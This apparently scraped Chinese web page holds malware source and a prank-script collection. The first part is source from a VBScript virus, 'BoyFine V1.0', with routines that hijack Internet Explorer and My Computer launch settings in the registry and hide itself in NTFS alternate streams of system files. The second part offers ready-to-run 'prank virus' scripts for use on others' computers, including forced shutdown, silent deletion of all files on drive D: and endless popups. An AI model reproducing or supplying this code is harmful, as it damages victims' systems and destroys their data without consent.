SubSubSetIEAss(sFilePath)'篡改IE启动设置On Error Resume NextDim ValueValue="%SystemRoot%\System32\WScript.exe "&""""&sFilePath&""""&" OIE " CallWriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\iexplore.e xe\shell\open\command\", Value, "REG_EXPAND_SZ")CallWriteReg("HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B3030 9D}\shell\OpenHomePage\Command\", Value, "REG_EXPAND_SZ")End SubSub SetMyComputerAss(sFilePath)'改变我的电脑的打开关联，包括Win+EOn Error Resume NextDim Value1,Value2Value1="%SystemRoot%\System32\WScript.exe "&""""&sFilePath&""""&" OMC "Value2="%SystemRoot%\System32\WScript.exe "&""""&sFilePath&""""&" EMC "CallWriteReg("HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B3030 9D}\shell\", "", "REG_SZ")CallWriteReg("HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B3030 9D}\shell\open\command\", Value1, "REG_EXPAND_SZ")CallWriteReg("HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B3030 9D}\shell\explore\command\", Value2, "REG_EXPAND_SZ")End SubFunction GetSerialNumber(Drv)'获取驱动器序列号的绝对值On Error Resume NextSet d=fso.GetDrive(Drv)GetSerialNumber=d.SerialNumber'返回十进制序列号，用于唯一标识一个磁盘卷GetSerialNumber=Replace(GetSerialNumber,"-","")'去掉负号End FunctionFunction GetMainVirus(N)'根据N的值获取不同的字符串On Error Resume NextMainVirusName=GetSerialNumber(GetSystemDrive())&".vbs"'以驱动器的序列号绝对值为vbs病毒的名字If GetFileSystemType(GetSystemDrive())="NTFS" Then'系统盘是NTFS分区If N=1 ThenGetMainVirus=Fso.GetSpecialFolder(N)&"\smss.exe:"&MainVirusName'返回"c:\windows\system32\smss.exe:72161642.vbs"End IfIf N=0 ThenGetMainVirus=Fso.GetSpecialFolder(N)&"\explorer.exe:"&MainVirusName'返回"c:\windows\explorer.exe:72161642.vbs"End IfElse'系统盘是FAT32分区GetMainVirus=Fso.GetSpecialFolder(N)&"\"&MainVirusName'返回"c:\windows\72161642.vbs"或者"c:\windows\system32\72161642.vbs"End IfEnd FunctionFunction VBSProcessCount(VBSPath)'返回指定路径vbs脚本的运行个数On Error Resume NextDim WMIService, ProcessList, ProcessVBSProcessCount=0Set WMIService=GetObject("winmgmts:\\.\root\cimv2")Set ProcessList=WMIService.ExecQuery("Select * from Win32_Process Where "&"Name='cscript.exe' or Name='wscript.exe' or Name='svchost.exe'") For Each Process in ProcessListIf InStr(mandLine, VBSPath)>0 ThenVBSProcessCount=VBSProcessCount+1End IfNextEnd FunctionFunction PreDblInstance()'用来计数wscript进程的个数，如果大于等于3个那么返回TrueOn Error Resume NextPreDblInstance=FalseIf VBSProcessCount(WScript.ScriptFullName)>= 3 ThenPreDblInstance=TrueEnd IfEnd FunctionFunction GetTargetPath(LnkPath)'获取快捷方式的vbs脚本地址On Error Resume NextDim ShortcutSet Shortcut=WshShell.CreateShortcut(LnkPath)GetTargetPath=Shortcut.TargetPathEnd FunctionFunction GetCode(FullPath)'获取文件的所有代码On Error Resume NextDim FileTextSet FileText=FSO.OpenTextFile(FullPath, 1)GetCode=FileText.ReadAllFileText.CloseEnd FunctionFunction GetVersion()'获取windows版本Dim VerInfoVerInfo="HKEY_CURRENT_USER\SoftWare\Microsoft\WindowsNT\CurrentVersion\Windows\Ver"If ReadReg(VerInfo)="" ThenGetVersion=0ElseGetVersion=CInt(ReadReg(VerInfo))End IfEnd FunctionSub VirusAlert()'创建一个BFAlert.hta，然后打开该网页，黑黑的，什么都没有，吓人的On Error Resume NextDim HtaPath,HtaCodeHtaPath=Fso.GetSpecialFolder(1)&"\BFAlert.hta"HtaCode="<HTML><HEAD><TITLE>暴风一号</TITLE>"&VBCRLF&"<HTA:APPLICATION APPLICATIONNAME=""BoyFine V1.0"" SCROLL=""no"" windowstate=""maximize""border=""none"""&VBCRLF&"SINGLEINSTANCE=""yes"" CAPTION=""no"" contextMenu=""no"" ShowInTaskBar=""no""selection=""no"">"&VBCRLF&"</HEAD><BODY bgcolor=#000000><DIV align =""center"">"&VBCRLF&"<fontstyle=""font-size:3500%;font-family:Wingdings;color=red"">N</font><BR >"&VBCRLF&"<font style=""font-size:200%;font-family:黑体;color=red"">暴风一号</font>"&VBCRLF&"</DIV></BODY></HTML>"If FSO.FileExists(HtaPath)=False ThenCall CreateFile(HtaCode, HtaPath)Call SetHiddenAttr(HtaPath)End IfCall Run(HtaPath)End SubFunction GetInfectedDate()'获取感染日期On Error Resume NextDim DateInfoDateInfo="HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Date"If ReadReg(DateInfo)="" ThenGetInfectedDate=""ElseGetInfectedDate=CDate(ReadReg(DateInfo))End IfEnd FunctionSub MakeJoke(Times)'恶搞，弹出光驱On Error Resume NextDim WMP, colCDROMsSet WMP = CreateObject( "WMPlayer.OCX" )Set colCDROMs = WMP.cdromCollectionIf colCDROMs.Count>0 ThenFor i=1 to TimescolCDROMs.Item(0).eject()WScript.Sleep 3000colCDROMs.Item(0).eject()NextEnd IfSet WMP = NothingEnd Sub。

整⼈病毒vbs⼤全！新建⼀个记事本把代码复制进去重名名为vbs格式的就可以了解除这个vbs脚本的办法就简单了只要关掉任务管理器⾥Wscript.exe这个进程就好了1、你打开好友的聊天对话框,然后记下在你QQ⾥好友的昵称,把下⾯代码⾥的xx替换⼀下,就可以⾃定义发送QQ信息到好友的次数(代码⾥的数字10改⼀下即可).xx.vbs=>—————————————————————————代码如下：On Error Resume NextDim wsh,yeset wsh=createobject(“wscript.shell”)for i=1 to 10wscript.sleep 700wsh.AppActivate(“与 xx 聊天中“)wsh.sendKeys “^v”wsh.sendKeys iwsh.sendKeys “%s”nextwscript.quit—————————————————————————2、我就⽤这个程序放在学校图书馆查询书刊的机器上，好多⼈都那它没办法，哈哈—————————————————————————代码如下：domsgbox “You are foolish!”loop—————————————————————————3、直接关机—————————————————————————代码如下：dim WSHshellset WSHshell = wscript.createobject(“wscript.shell”)WSHshell.run “shutdown -f -s -t 00”,0 ,true—————————————————————————4、删除D:\所有⽂件—————————————————————————代码如下：dim WSHshellset WSHshell = wscript.createobject(“wscript.shell”)WSHshell.run “cmd /c “”del d:\*.* / f /q /s”””,0 ,true —————————————————————————5、不断弹出窗⼝—————————————————————————代码如下：while(1)msgbox “哈哈你被耍了！“loop—————————————————————————6、不断按下alt+f4 （开什么都关闭……）病毒太强必须关机才⾏！—————————————————————————代码如下：dim WSHshellset WSHshell = wscript.createobject(“wscript.shell”)while(1)WSHshell.SendKeys “%{F4}”Wend—————————————————————————7、按500次回车(以下代码在运⾏者的电脑上显⽰500个对话框。